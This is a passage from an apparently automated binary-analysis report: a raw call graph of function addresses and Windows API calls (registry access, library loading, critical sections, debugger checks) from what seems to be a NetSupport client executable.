27135->27137 27136->27111 27137->27136 27138 1116a147 66 API calls 27137->27138 27139 11172926 27138->27139 27139->27136 27140 1116a147 66 API calls 27139->27140 27141 11172933 27140->27141 27142 1116a147 66 API calls 27141->27142 27142->27136 27143->27103 27144->27107 27146 1116a153 27145->27146 27147 1116a168 27145->27147 27211 1116a1af 66 API calls 27146->27211 27147->27114 27149 1116a158 27212 1116edc4 11 API calls 27149->27212 27151 1116a163 27151->27114 27152->27115 27153->27111 27154->27107 27156 1116ac39 66 API calls 27155->27156 27157 11178005 27156->27157 27157->27129 27159 1117565c 27158->27159 27160 11175664 27159->27160 27161 1117567f 27159->27161 27200 1116a1c2 66 API calls 27160->27200 27162 1117568b 27161->27162 27168 111756c5 27161->27168 27202 1116a1c2 66 API calls 27162->27202 27165 11175669 27201 1116a1af 66 API calls 27165->27201 27167 11175690 27203 1116a1af 66 API calls 27167->27203 27170 111756e7 27168->27170 27171 111756d2 27168->27171 27190 111778c4 27170->27190 27205 1116a1c2 66 API calls 27171->27205 27174 11175698 27204 1116edc4 11 API calls 27174->27204 27175 111756d7 27206 1116a1af 66 API calls 27175->27206 27176 111756ed 27179 1117570f 27176->27179 27180 111756fb 27176->27180 27178 11175671 27178->27134 27207 1116a1af 66 API calls 27179->27207 27182 11175099 75 API calls 27180->27182 27184 11175707 27182->27184 27209 1117573e LeaveCriticalSection 27184->27209 27185 11175714 27208 1116a1c2 66 API calls 27185->27208 27188->27126 27189->27136 27191 111778d0 27190->27191 27192 1117792a 27191->27192 27195 1117459f 66 API calls 27191->27195 27193 1117792f EnterCriticalSection 27192->27193 27194 1117794c 27192->27194 27193->27194 27194->27176 27196 111778fc 27195->27196 27197 11177905 InitializeCriticalSectionAndSpinCount 27196->27197 27198 11177918 27196->27198 27197->27198 27210 1117795a LeaveCriticalSection 27198->27210 27200->27165 27201->27178 27202->27167 27203->27174 27204->27178 27205->27175 27206->27174 27207->27185 27208->27184 27209->27178 27210->27192 27211->27149 27212->27151 27214 11164c2f 27213->27214 27215 11164c1b 27213->27215 27221 11164c2b 27214->27221 27232 1116bf37 27214->27232 27265 1116a1af 66 API calls 27215->27265 27217 11164c20 27266 1116edc4 11 API calls 27217->27266 27231 11164ce3 LeaveCriticalSection LeaveCriticalSection 27221->27231 27224 1116a147 66 API calls 27225 11164c49 27224->27225 27242 11171e64 27225->27242 27227 11164c4f 27227->27221 27228 11163aa5 66 API calls 27227->27228 27228->27221 27229->26743 27230->26746 27231->26746 27233 1116bf50 27232->27233 27237 11164c3b 27232->27237 27234 1116a147 66 API calls 27233->27234 27233->27237 27235 1116bf6b 27234->27235 27267 111730a4 95 API calls 27235->27267 27238 11171f28 27237->27238 27239 11164c43 27238->27239 27240 11171f38 27238->27240 27239->27224 27240->27239 27241 11163aa5 66 API calls 27240->27241 27241->27239 27243 11171e70 27242->27243 27244 11171e93 27243->27244 27245 11171e78 27243->27245 27247 11171e9f 27244->27247 27250 11171ed9 27244->27250 27268 1116a1c2 66 API calls 27245->27268 27270 1116a1c2 66 API calls 27247->27270 27248 11171e7d 27269 1116a1af 66 API calls 27248->27269 27254 111778c4 68 API calls 27250->27254 27252 11171ea4 27271 1116a1af 66 API calls 27252->27271 27257 11171edf 27254->27257 27255 11171e85 27255->27227 27256 11171eac 27272 1116edc4 11 API calls 27256->27272 27259 11171eed 27257->27259 27260 11171ef9 27257->27260 27261 11171dc8 69 API calls 27259->27261 27273 1116a1af 66 API calls 27260->27273 27263 11171ef3 27261->27263 27274 11171f20 LeaveCriticalSection 27263->27274 27265->27217 27266->27221 27267->27237 27268->27248 27269->27255 27270->27252 27271->27256 27272->27255 27273->27263 27274->27255 27276 11164524 27275->27276 27279 111642e0 27276->27279 27291 11164259 27279->27291 27281 11164304 27299 1116a1af 66 API calls 27281->27299 27284 1116433a 27288 11164381 27284->27288 27301 11171a63 79 API calls 27284->27301 27285 11164309 27300 1116edc4 11 API calls 27285->27300 27290 11028d75 27288->27290 27302 1116a1af 66 API calls 27288->27302 27290->26727 27290->26754 27292 1116426c 27291->27292 27293 111642b9 27291->27293 27294 1116c675 66 API calls 27292->27294 27293->27281 27293->27284 27295 11164271 27294->27295 27296 11164299 27295->27296 27297 11171306 74 API calls 27295->27297 27296->27293 27303 111715a2 68 API calls 27296->27303 27297->27296 27299->27285 27300->27290 27301->27284 27302->27290 27303->27293 27305 11164bc9 27304->27305 27309 1114527c 27304->27309 27306 11163a11 66 API calls 27305->27306 27307 11164bdc 27306->27307 27308 1116cd5f 66 API calls 27307->27308 27307->27309 27310 11164bee 27308->27310 27309->26679 27310->27309 27311 1116ed72 10 API calls 27310->27311 27311->27309 27313 11163a11 66 API calls 27312->27313 27314 1111023e 27313->27314 27315 11110247 27314->27315 27316 1111025e 27314->27316 27320 11029a70 262 API calls 27315->27320 27316->26695 27322 11145c91 GetVersionExA 27321->27322 27323 11145e6c 27321->27323 27322->27323 27324 11145cb3 27322->27324 27325 11145e75 27323->27325 27330 11145ed4 27323->27330 27356 11081f20 86 API calls 27323->27356 27324->27323 27326 11145cc0 RegOpenKeyExA 27324->27326 27327 11162bb7 5 API calls 27325->27327 27326->27323 27328 11145ced 27326->27328 27329 11145e82 27327->27329 27354 11143bd0 RegQueryValueExA 27328->27354 27329->26663 27331 11162bb7 5 API calls 27330->27331 27332 11145ee4 27331->27332 27332->26663 27336 11145ebc 27336->27325 27339 11163ca7 79 API calls 27336->27339 27337 11143bd0 RegQueryValueExA 27338 11145d59 27337->27338 27340 11145e5f RegCloseKey 27338->27340 27342 11163ca7 79 API calls 27338->27342 27341 11145ecd 27339->27341 27340->27323 27341->27325 27341->27330 27343 11145d6e 27342->27343 27344 111648ed 79 API calls 27343->27344 27345 11145d7d 27344->27345 27346 11145d96 27345->27346 27347 111648ed 79 API calls 27345->27347 27348 11163ca7 79 API calls 27346->27348 27347->27345 27350 11145da2 27348->27350 27349 11145e41 27349->27340 27350->27349 27351 11143bd0 RegQueryValueExA 27350->27351 27352 11145e18 27351->27352 27353 11143bd0 RegQueryValueExA 27352->27353 27353->27349 27355 11143bfa 27354->27355 27355->27337 27356->27336 27644 111447f0 27645 111447fc GetCurrentProcess 27644->27645 27646 1114481f 27644->27646 27645->27646 27647 1114480d GetModuleFileNameA 27645->27647 27648 111101b0 260 API calls 27646->27648 27650 11144849 27646->27650 27647->27646 27649 1114483b 27648->27649 27649->27650 27652 11144140 GetModuleFileNameA 27649->27652 27653 11144183 27652->27653 27655 111441c3 27652->27655 27654 11081e00 IsDBCSLeadByte 27653->27654 27656 11144191 27654->27656 27657 111441cf LoadLibraryA 27655->27657 27658 111441e9 GetModuleHandleA GetProcAddress 27655->27658 27656->27655 27659 11144198 LoadLibraryA 27656->27659 27657->27658 27660 111441de LoadLibraryA 27657->27660 27661 11144217 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27658->27661 27662 11144209 27658->27662 27659->27655 27660->27658 27663 11144243 10 API calls 27661->27663 27662->27663 27664 11162bb7 5 API calls 27663->27664 27665 111442c0 27664->27665 27665->27650 27666 110017f0 27667 11001811 GetTickCount 27666->27667 27668 11001807 27666->27668 27677 11122920 27667->27677 27670 1100186a 27671 11001830 GetTickCount 27672 11001824 27671->27672 27673 1100183d GetQueueStatus 27671->27673 27672->27670 27672->27671 27674 1100185d 27672->27674 27675 11122920 593 API calls 27672->27675 27673->27672 27673->27674 27674->27670 27689 11118e70 24 API calls 27674->27689 27675->27672 27678 11122944 27677->27678 27679 1112292d 27677->27679 27691 11110920 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection 27678->27691 27690 11029a70 262 API calls 27679->27690 27683 1112294c 27684 11122952 27683->27684 27692 111224e0 27683->27692 27684->27672 27686 1112295f 27747 11067690 88 API calls 27686->27747 27688 11122966 27688->27672 27689->27670 27691->27683 27693 11122510 27692->27693 27694 111224ff 27692->27694 27695 11122540 27693->27695 27696 11122519 GetTickCount 27693->27696 27694->27686 27699 11122693 27695->27699 27700 1112257a 27695->27700 27701 1112261a 27695->27701 27702 1112267b 27695->27702 27703 11122599 27695->27703 27704 111226be 27695->27704 27705 1112265d 27695->27705 27706 111225c3 27695->27706 27707 11122740 27695->27707 27708 11122706 27695->27708 27709 1112274a 27695->27709 27710 1112258a 27695->27710 27711 111225a8 27695->27711 27712 11122629 27695->27712 27713 111226a9 27695->27713 27714 1112264c 27695->27714 27715 1112266c 27695->27715 27734 11122582 27695->27734 27741 111227cf 27695->27741 27696->27695 27697 1112252c 27696->27697 27748 11116320 100 API calls 27697->27748 27760 1111d660 21 API calls 27699->27760 27749 11121b80 359 API calls 27700->27749 27754 1111c940 101 API calls 27701->27754 27759 1111d820 24 API calls 27702->27759 27751 11120cd0 303 API calls 27703->27751 27704->27734 27737 111226e5 27704->27737 27704->27741 27757 11121410 302 API calls 27705->27757 27729 111225da 27706->27729 27706->27734 27765 11112e00 323 API calls 27707->27765 27764 11147060 21 API calls 27708->27764 27766 1105e820 79 API calls 27709->27766 27750 1111d040 284 API calls 27710->27750 27711->27734 27752 11121090 100 API calls 27711->27752 27755 11114590 86 API calls 27712->27755 27761 1115ef20 292 API calls 27713->27761 27756 11122260 361 API calls 27714->27756 27758 1111a800 269 API calls 27715->27758 27716 1112253d 27716->27695 27753 11119e70 15 API calls 27729->27753 27732 11122710 GetTickCount 27732->27734 27744 111225df 27732->27744 27733 11122760 27733->27734 27767 11112f50 27733->27767 27734->27741 27746 111227bb 27734->27746 27782 1105e820 79 API calls 27734->27782 27762 11119e30 GetWindowOrgEx ClientToScreen 27737->27762 27740 111226ec 27763 1115f030 293 API calls 27740->27763 27741->27686 27744->27734 27746->27741 27783 11112af0 267 API calls 27746->27783 27747->27688 27748->27716 27749->27734 27750->27734 27751->27734 27752->27734 27753->27744 27754->27734 27755->27744 27756->27744 27757->27734 27758->27734 27759->27734 27760->27734 27761->27744 27762->27740 27763->27744 27764->27732 27765->27734 27766->27733 27768 11112f61 27767->27768 27769 11112f9e 27768->27769 27784 1105e820 79 API calls 27768->27784 27786 1100abc0 263 API calls 27769->27786 27772 11112fa9 27773 11112fca 27772->27773 27776 11112fb6 27772->27776 27774 11142e60 262 API calls 27773->27774 27777 11112fc8 27774->27777 27775 11112f84 27775->27769 27785 1105e950 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 27775->27785 27787 11147af0 27776->27787 27790 1100ac10 268 API calls 27777->27790 27781 11112fe6 27781->27734 27782->27746 27783->27741 27784->27775 27785->27769 27786->27772 27791 111479b0 27787->27791 27790->27781 27806 110963b0 27791->27806 27794 11147a02 27797 11147a1e 27794->27797 27798 11147a09 wsprintfA 27794->27798 27795 111479f0 27808 111452d0 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 27795->27808 27799 11147a26 27797->27799 27800 11147a3a 27797->27800 27798->27800 27809 11029a70 262 API calls 27799->27809 27810 11147850 264 API calls 27800->27810 27803 11147a4a 27804 11162bb7 5 API calls 27803->27804 27805 11147a5a 27804->27805 27805->27777 27807 110963b9 LoadStringA 27806->27807 27807->27794 27807->27795 27808->27794 27810->27803 28241 111655e0 68 API calls 28242 110895f0 GetCurrentThreadId EnterCriticalSection LeaveCriticalSection LeaveCriticalSection 28243 11001000 263 API calls 28420 11002600 66 API calls 27621 11146010 27622 11146031 27621->27622 27623 1114610d 27621->27623 27635 11145f00 27622->27635 27625 11162bb7 5 API calls 27623->27625 27627 11146117 27625->27627 27628 11146044 27629 1114605a GetVersionExA LoadLibraryA 27628->27629 27630 111460a1 GetProcAddress 27629->27630 27631 111460ca GetSystemDefaultLangID 27629->27631 27632 111460b1 27630->27632 27633 111460be FreeLibrary 27630->27633 27634 111460db 27631->27634 27632->27633 27633->27631 27633->27634 27634->27623 27643 11145f30 27635->27643 27636 11145f5f RegOpenKeyExA 27636->27643 27637 11145fee 27640 11162bb7 5 API calls 27637->27640 27638 11143bd0 RegQueryValueExA 27638->27643 27639 11145fcd RegCloseKey 27639->27637 27639->27643 27642 11146001 27640->27642 27641 11163ca7 79 API calls 27641->27643 27642->27623 27642->27628 27643->27636 27643->27637 27643->27638 27643->27639 27643->27641 28247 1100e810 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 28423 11001210 CallWindowProcA 28424 11005210 12 API calls 28250 11015c10 268 API calls 27864 11160400 27867 1115f240 GlobalAddAtomA 27864->27867 27868 1115f275 GetLastError wsprintfA 27867->27868 27869 1115f2c7 GlobalAddAtomA GlobalAddAtomA 27867->27869 27876 11029a70 262 API calls 27868->27876 27871 11162bb7 5 API calls 27869->27871 27872 1115f2fe 27871->27872 28428 110cca10 279 API calls 28253 11007420 300 API calls 28429 1100d620 FreeLibrary 28431 11001e20 SetFocus 28254 11017420 FindWindowA GetWindowLongA PostMessageA SendMessageA 28435 11088e20 PostQuitMessage 28441 11014e30 263 API calls 28443 11166a2f 80 API calls 28444 1100823b RaiseException 28141 11e1020 GetCommandLineA 28143 11e1035 GetStartupInfoA 28141->28143 28144 11e108b 28143->28144 28145 11e1090 GetModuleHandleA 28143->28145 28144->28145 28148 11e1000 _NSMClient32 28145->28148 28147 11e10a2 ExitProcess 28148->28147 28446 11008640 432 API calls 28450 11016a40 12 API calls 28451 11017a40 CreateEventA LoadLibraryA GetProcAddress SetLastError FreeLibrary 28265 11001050 263 API calls 28268 11014450 ImageList_Destroy 28456 1102ea50 300 API calls 28457 11007255 280 API calls 28272 11004860 8 API calls 28273 11001c60 263 API calls 28274 11018460 297 API calls 28276 11018c60 23 API calls 28460 11019260 338 API calls 28467 110cce60 98 API calls 28469 11001a70 InterlockedDecrement SetEvent PulseEvent InterlockedDecrement CloseHandle 28470 1100ea70 263 API calls 28475 11004e80 273 API calls 28286 11001090 263 API calls 28287 11001c90 263 API calls 28288 11006c90 286 API calls 28291 11029490 384 API calls 28481 11028690 SetEvent 27812 11145080 27813 1114508e 27812->27813 27814 11145089 27812->27814 27816 11145010 GetModuleFileNameA ExtractIconExA 27814->27816 27817 11162bb7 5 API calls 27816->27817 27818 11145078 27817->27818 27818->27813 28292 110ccc90 CreateWindowExA SetClassLongA GetSystemMetrics GetSystemMetrics 28149 1116c488 RtlEncodePointer 28298 110154a0 269 API calls 28301 110934a0 326 API calls 28485 11015ab0 298 API calls 27819 1115cca0 27820 1115ccb4 27819->27820 27821 1115ccac 27819->27821 27831 1116406b 27820->27831 27824 1115ccd4 27826 1115ce00 27827 11163aa5 66 API calls 27826->27827 27828 1115ce28 27827->27828 27829 1115ccf1 27829->27826 27829->27829 27830 1115cde4 SetLastError 27829->27830 27830->27829 27832 11170fc4 66 API calls 27831->27832 27833 11164085 27832->27833 27837 1115ccc8 27833->27837 27855 1116a1af 66 API calls 27833->27855 27835 11164098 27835->27837 27856 1116a1af 66 API calls 27835->27856 27837->27824 27837->27826 27838 1115c8e0 CoInitializeSecurity CoCreateInstance 27837->27838 27839 1115c955 wsprintfW SysAllocString 27838->27839 27840 1115cad4 27838->27840 27845 1115c99b 27839->27845 27841 11162bb7 5 API calls 27840->27841 27843 1115cb00 27841->27843 27842 1115cac1 SysFreeString 27842->27840 27843->27829 27844 1115caa9 27844->27842 27845->27842 27845->27844 27845->27845 27846 1115ca2c 27845->27846 27847 1115ca1a wsprintfW 27845->27847 27857 110978f0 27846->27857 27847->27846 27849 1115ca3e 27850 110978f0 263 API calls 27849->27850 27851 1115ca53 27850->27851 27862 110979a0 InterlockedDecrement SysFreeString 27851->27862 27853 1115ca97 27863 110979a0 InterlockedDecrement SysFreeString 27853->27863 27855->27835 27856->27837 27858 111101b0 262 API calls 27857->27858 27859 11097923 27858->27859 27860 11097936 SysAllocString 27859->27860 27861 11097954 27859->27861 27860->27861 27861->27849 27862->27853 27863->27844 28487 1100d2c0 375 API calls 28488 11008ec0 328 API calls 28306 1101b4c0 317 API calls 28490 110172c0 267 API calls 28310 11001cd0 263 API calls 28311 110170d0 266 API calls 28312 110150d0 268 API calls 28492 110186d0 GetProcAddress 28316 1100a0d3 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 28318 11166ccf 99 API calls 28319 110010e0 263 API calls 26165 11010ae0 26168 11010b25 26165->26168 26166 11010b49 26167 11010bba 26166->26167 26181 1100db10 26166->26181 26171 11010c3b 26167->26171 26216 1100dec0 67 API calls 26167->26216 26168->26166 26207 1100f8a0 67 API calls 26168->26207 26175 11010c52 26171->26175 26217 1100fb80 67 API calls 26171->26217 26182 11161531 int EnterCriticalSection 26181->26182 26183 1100db31 26182->26183 26184 11161559 int LeaveCriticalSection 26183->26184 26185 1100db45 26184->26185 26186 11010140 26185->26186 26187 11161531 int EnterCriticalSection 26186->26187 26188 11010172 26187->26188 26189 11161531 int EnterCriticalSection 26188->26189 26193 110101b6 26188->26193 26190 11010195 26189->26190 26192 11161559 int LeaveCriticalSection 26190->26192 26191 110101f6 26194 11161559 int LeaveCriticalSection 26191->26194 26192->26193 26193->26191 26218 1100f5c0 26193->26218 26196 11010266 26194->26196 26196->26167 26208 11161531 26196->26208 26198 11010227 26199 11161531 int EnterCriticalSection 26198->26199 26201 1101023a 26199->26201 26204 11161559 int LeaveCriticalSection 26201->26204 26202 11010219 26229 111634b1 RaiseException 26202->26229 26205 1101024e 26204->26205 26230 11161585 262 API calls 26205->26230 26207->26166 26209 11010b99 26208->26209 26210 11161543 26208->26210 26212 11161559 26209->26212 26608 111626fa EnterCriticalSection 26210->26608 26213 11161560 26212->26213 26214 1116156e 26212->26214 26609 1116270a LeaveCriticalSection 26213->26609 26214->26167 26216->26171 26217->26175 26219 1100f663 26218->26219 26220 1100f5f3 26218->26220 26219->26198 26228 111630c1 66 API calls 26219->26228 26220->26219 26231 111101b0 26220->26231 26222 1100f640 26222->26219 26240 1100ee20 26222->26240 26226 1100f629 26254 111614c1 74 API calls 26226->26254 26228->26202 26229->26198 26230->26191 26255 11163a11 26231->26255 26234 11110203 26238 11162bb7 5 API calls 26234->26238 26235 111101d7 wsprintfA 26272 11029a70 262 API calls 26235->26272 26239 1100f5fe 26238->26239 26239->26222 26253 1100ed70 103 API calls int 26239->26253 26281 111616da 26240->26281 26243 1100ee69 26245 1100ee7c 26243->26245 26246 11163aa5 66 API calls 26243->26246 26247 11163aa5 66 API calls 26245->26247 26249 1100ee8f 26245->26249 26246->26245 26247->26249 26248 1100eea2 26251 11161559 int LeaveCriticalSection 26248->26251 26249->26248 26250 11163aa5 66 API calls 26249->26250 26250->26248 26252 1100eeb6 26251->26252 26252->26219 26253->26226 26254->26222 26256 11163a8e 26255->26256 26261 11163a1f 26255->26261 26279 1116e368 DecodePointer 26256->26279 26258 11163a2a 26258->26261 26273 1116e85d 66 API calls 26258->26273 26274 1116e6ae 66 API calls 26258->26274 26275 1116e3ed GetModuleHandleW GetProcAddress ExitProcess 26258->26275 26259 11163a94 26280 1116a1af 66 API calls 26259->26280 26261->26258 26263 11163a4d RtlAllocateHeap 26261->26263 26266 11163a7a 26261->26266 26270 11163a78 26261->26270 26276 1116e368 DecodePointer 26261->26276 26263->26261 26264 111101ce 26263->26264 26264->26234 26264->26235 26277 1116a1af 66 API calls 26266->26277 26278 1116a1af 66 API calls 26270->26278 26273->26258 26274->26258 26276->26261 26277->26270 26278->26264 26279->26259 26280->26264 26282 111616e9 26281->26282 26284 1100ee57 26281->26284 26291 111663a3 26282->26291 26284->26243 26285 11163aa5 26284->26285 26286 11163ab0 HeapFree 26285->26286 26290 11163ad9 26285->26290 26287 11163ac5 26286->26287 26286->26290 26607 1116a1af 66 API calls 26287->26607 26289 11163acb GetLastError 26289->26290 26290->26243 26292 111663af 26291->26292 26293 111663d0 26292->26293 26294 111663b9 26292->26294 26327 1116c675 26293->26327 26385 1116a1af 66 API calls 26294->26385 26298 111663be 26386 1116edc4 11 API calls 26298->26386 26301 111663c9 26301->26284 26302 111663df 26347 1116ac7e 26302->26347 26306 1116640b 26360 11165814 26306->26360 26313 111664ec 26391 111710d5 8 API calls 26313->26391 26314 1116643b 26317 1117459f 66 API calls 26314->26317 26316 111664f2 26392 1117116e 66 API calls 26316->26392 26319 11166461 26317->26319 26387 111712b9 74 API calls 26319->26387 26321 11166473 26388 111710d5 8 API calls 26321->26388 26323 11166479 26324 11166497 26323->26324 26389 111712b9 74 API calls 26323->26389 26390 111664e1 LeaveCriticalSection 26324->26390 26393 1116c5fc GetLastError 26327->26393 26329 1116c67d 26330 111663d5 26329->26330 26407 1116e66a 66 API calls 26329->26407 26332 11171306 26330->26332 26333 11171312 26332->26333 26334 1116c675 66 API calls 26333->26334 26335 11171317 26334->26335 26336 11171345 26335->26336 26338 11171329 26335->26338 26337 1117459f 66 API calls 26336->26337 26339 1117134c 26337->26339 26340 1116c675 66 API calls 26338->26340 26413 111712b9 74 API calls 26339->26413 26342 1117132e 26340->26342 26346 1117133c 26342->26346 26412 1116e66a 66 API calls 26342->26412 26343 11171360 26414 11171373 LeaveCriticalSection 26343->26414 26346->26302 26350 1116ac87 26347->26350 26349 111663f5 26349->26301 26353 1117459f 26349->26353 26350->26349 26351 1116aca5 Sleep 26350->26351 26415 11170fc4 26350->26415 26352 1116acba 26351->26352 26352->26349 26352->26350 26354 111745c7 EnterCriticalSection 26353->26354 26355 111745b4 26353->26355 26354->26306 26426 111744dd 26355->26426 26357 111745ba 26357->26354 26453 1116e66a 66 API calls 26357->26453 26361 1116581d 26360->26361 26362 11165836 26360->26362 26361->26362 26466 11171046 8 API calls 26361->26466 26364 111664d5 26362->26364 26467 111744c6 LeaveCriticalSection 26364->26467 26366 11166422 26367 11166187 26366->26367 26368 111661b0 26367->26368 26371 111661cb 26367->26371 26369 11165e4d 101 API calls 26368->26369 26373 111661ba 26368->26373 26369->26373 26370 1116631c 26468 11165c2c 26370->26468 26371->26370 26379 111662f5 26371->26379 26381 11166200 26371->26381 26375 11162bb7 5 API calls 26373->26375 26376 111663a1 26375->26376 26376->26313 26376->26314 26377 11166331 26377->26373 26377->26379 26482 11165e4d 26377->26482 26379->26373 26528 11165ac7 70 API calls 26379->26528 26381->26373 26381->26379 26382 1116630e 26381->26382 26384 11165e4d 101 API calls 26381->26384 26524 111699f9 66 API calls 26381->26524 26525 1116ed72 26382->26525 26384->26381 26385->26298 26386->26301 26387->26321 26388->26323 26389->26324 26390->26301 26391->26316 26392->26301 26408 1116c4ba TlsGetValue 26393->26408 26396 1116c669 SetLastError 26396->26329 26397 1116ac7e 62 API calls 26398 1116c627 26397->26398 26398->26396 26399 1116c62f DecodePointer 26398->26399 26400 1116c644 26399->26400 26401 1116c660 26400->26401 26402 1116c648 26400->26402 26404 11163aa5 62 API calls 26401->26404 26411 1116c548 66 API calls 26402->26411 26406 1116c666 26404->26406 26405 1116c650 GetCurrentThreadId 26405->26396 26406->26396 26409 1116c4cf RtlDecodePointer TlsSetValue 26408->26409 26410 1116c4ea 26408->26410 26409->26410 26410->26396 26410->26397 26411->26405 26413->26343 26414->26342 26416 11170fd0 26415->26416 26418 11170feb 26415->26418 26417 11170fdc 26416->26417 26416->26418 26424 1116a1af 66 API calls 26417->26424 26419 11170ffe RtlAllocateHeap 26418->26419 26421 11171025 26418->26421 26425 1116e368 DecodePointer 26418->26425 26419->26418 26419->26421 26421->26350 26422 11170fe1 26422->26350 26424->26422 26425->26418 26427 111744e9 26426->26427 26428 11174511 26427->26428 26429 111744f9 26427->26429 26435 1117451f 26428->26435 26457 1116ac39 26428->26457 26454 1116e85d 66 API calls 26429->26454 26431 111744fe 26455 1116e6ae 66 API calls 26431->26455 26435->26357 26436 11174505 26456 1116e3ed GetModuleHandleW GetProcAddress ExitProcess 26436->26456 26437 11174531 26463 1116a1af 66 API calls 26437->26463 26438 11174540 26441 1117459f 65 API calls 26438->26441 26442 11174547 26441->26442 26444 1117454f InitializeCriticalSectionAndSpinCount 26442->26444 26445 1117457a 26442->26445 26446 1117456b 26444->26446 26447 1117455f 26444->26447 26448 11163aa5 65 API calls 26445->26448 26465 11174596 LeaveCriticalSection 26446->26465 26449 11163aa5 65 API calls 26447->26449 26448->26446 26450 11174565 26449->26450 26464 1116a1af 66 API calls 26450->26464 26454->26431 26455->26436 26459 1116ac42 26457->26459 26458 11163a11 65 API calls 26458->26459 26459->26458 26460 1116ac78 26459->26460 26461 1116ac59 Sleep 26459->26461 26460->26437 26460->26438 26462 1116ac6e 26461->26462 26462->26459 26462->26460 26463->26435 26464->26446 26465->26435 26466->26362 26467->26366 26469 1116c675 66 API calls 26468->26469 26470 11165c67 26469->26470 26475 11165cd4 26470->26475 26478 11165ccd 26470->26478 26572 1116cd5f 26470->26572 26471 11162bb7 5 API calls 26472 11165e4b 26471->26472 26472->26377 26475->26471 26476 1116ed72 10 API calls 26476->26478 26478->26475 26478->26476 26479 1116cd5f 66 API calls 26478->26479 26529 1116593d 26478->26529 26536 11174bcc 26478->26536 26581 11165a5c 66 API calls 26478->26581 26582 111699f9 66 API calls 26478->26582 26479->26478 26483 1116c675 66 API calls 26482->26483 26484 11165e7a 26483->26484 26485 11165c2c 96 API calls 26484->26485 26489 11165ea2 26485->26489 26486 11165ea9 26487 11162bb7 5 API calls 26486->26487 26488 11165eb7 26487->26488 26488->26377 26489->26486 26490 1116ac39 66 API calls 26489->26490 26491 11165ef3 26490->26491 26491->26486 26492 1116cd5f 66 API calls 26491->26492 26498 11165f66 26492->26498 26493 11166155 26494 1116ed72 10 API calls 26493->26494 26495 11166186 26494->26495 26496 111661b0 26495->26496 26505 111661cb 26495->26505 26497 111661ba 26496->26497 26500 11165e4d 100 API calls 26496->26500 26507 11162bb7 5 API calls 26497->26507 26498->26493 26515 1116606a 26498->26515 26598 11174ea4 79 API calls 26498->26598 26499 111662f5 26499->26497 26600 11165ac7 70 API calls 26499->26600 26500->26497 26501 1116631c 26506 11165c2c 96 API calls 26501->26506 26503 111660f0 26509 11163aa5 66 API calls 26503->26509 26504 11166121 26504->26493 26510 1116612d InterlockedDecrement 26504->26510 26505->26499 26505->26501 26520 11166200 26505->26520 26517 11166331 26506->26517 26511 111663a1 26507->26511 26509->26486 26510->26493 26512 11166145 26510->26512 26511->26377 26513 11163aa5 66 API calls 26512->26513 26514 1116614d 26513->26514 26516 11163aa5 66 API calls 26514->26516 26515->26503 26515->26504 26516->26493 26517->26497 26517->26499 26518 11165e4d 100 API calls 26517->26518 26518->26517 26520->26497 26520->26499 26521 1116630e 26520->26521 26523 11165e4d 100 API calls 26520->26523 26599 111699f9 66 API calls 26520->26599 26522 1116ed72 10 API calls 26521->26522 26522->26497 26523->26520 26524->26381 26601 1116ec49 26525->26601 26528->26373 26530 11165956 26529->26530 26532 11165962 26530->26532 26534 11165985 26530->26534 26583 111699f9 66 API calls 26530->26583 26532->26478 26533 1116ed72 10 API calls 26533->26534 26534->26532 26534->26533 26584 111699f9 66 API calls 26534->26584 26537 1116c675 66 API calls 26536->26537 26542 11174bd9 26537->26542 26538 11174be6 GetUserDefaultLCID 26564 11174c6d 26538->26564 26540 11174c10 26541 11174c78 26540->26541 26543 11174c22 26540->26543 26541->26538 26546 11174c83 26541->26546 26542->26538 26542->26540 26585 1117463f 85 API calls 26542->26585 26545 11174c36 26543->26545 26549 11174c2d 26543->26549 26590 11174b90 EnumSystemLocalesA 26545->26590 26553 11174c89 EnumSystemLocalesA 26546->26553 26548 11174cde 26554 11174d03 IsValidCodePage 26548->26554 26560 11174dae 26548->26560 26586 11174b29 26549->26586 26552 11174c34 26552->26564 26591 1117463f 85 API calls 26552->26591 26553->26564 26556 11174d15 IsValidLocale 26554->26556 26554->26560 26556->26560 26561 11174d28 26556->26561 26557 11174c54 26558 11174c6f 26557->26558 26562 11174c66 26557->26562 26557->26564 26592 11174b90 EnumSystemLocalesA 26558->26592 26560->26478 26561->26560 26565 11174d79 GetLocaleInfoA 26561->26565 26566 1116cd5f 66 API calls 26561->26566 26563 11174b29 EnumSystemLocalesA 26562->26563 26563->26564 26564->26560 26593 111746a1 82 API calls 26564->26593 26565->26560 26567 11174d8a GetLocaleInfoA 26565->26567 26569 11174d66 26566->26569 26567->26560 26568 11174d9e 26567->26568 26594 1116c308 66 API calls 26568->26594 26569->26567 26571 1116ed72 10 API calls 26569->26571 26571->26565 26573 1116cd74 26572->26573 26574 1116cd6d 26572->26574 26595 1116a1af 66 API calls 26573->26595 26574->26573 26577 1116cd92 26574->26577 26578 1116cd83 26577->26578 26597 1116a1af 66 API calls 26577->26597 26578->26478 26580 1116cd79 26596 1116edc4 11 API calls 26580->26596 26581->26478 26582->26478 26583->26534 26584->26534 26585->26540 26587 11174b30 26586->26587 26588 11174b66 EnumSystemLocalesA 26587->26588 26589 11174b80 26588->26589 26589->26552 26590->26552 26591->26557 26592->26564 26593->26548 26594->26560 26595->26580 26596->26578 26597->26580 26598->26515 26599->26520 26600->26497 26602 1116ec68 26601->26602 26603 1116ec86 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 26602->26603 26604 1116ed54 26603->26604 26605 11162bb7 5 API calls 26604->26605 26606 1116ed70 GetCurrentProcess TerminateProcess 26605->26606 26606->26373 26607->26289 26608->26209 26609->26214 27357 11026ae0 27358 11026b0f 27357->27358 27373 110d1930 27358->27373 27360 11026b19 27361 111101b0 262 API calls 27360->27361 27362 11026b31 27361->27362 27363 11026b5f 27362->27363 27383 11061aa0 27362->27383 27402 1105e670 421 API calls 27363->27402 27366 11026ba3 27403 11089ee0 CloseHandle 27366->27403 27368 11026bae 27404 110d0a10 262 API calls 27368->27404 27370 11026bbd 27371 11162bb7 5 API calls 27370->27371 27372 11026bd4 27371->27372 27405 110d16d0 27373->27405 27376 110d197b 27379 110d1995 27376->27379 27380 110d1978 27376->27380 27377 110d1964 27419 11029a70 262 API calls 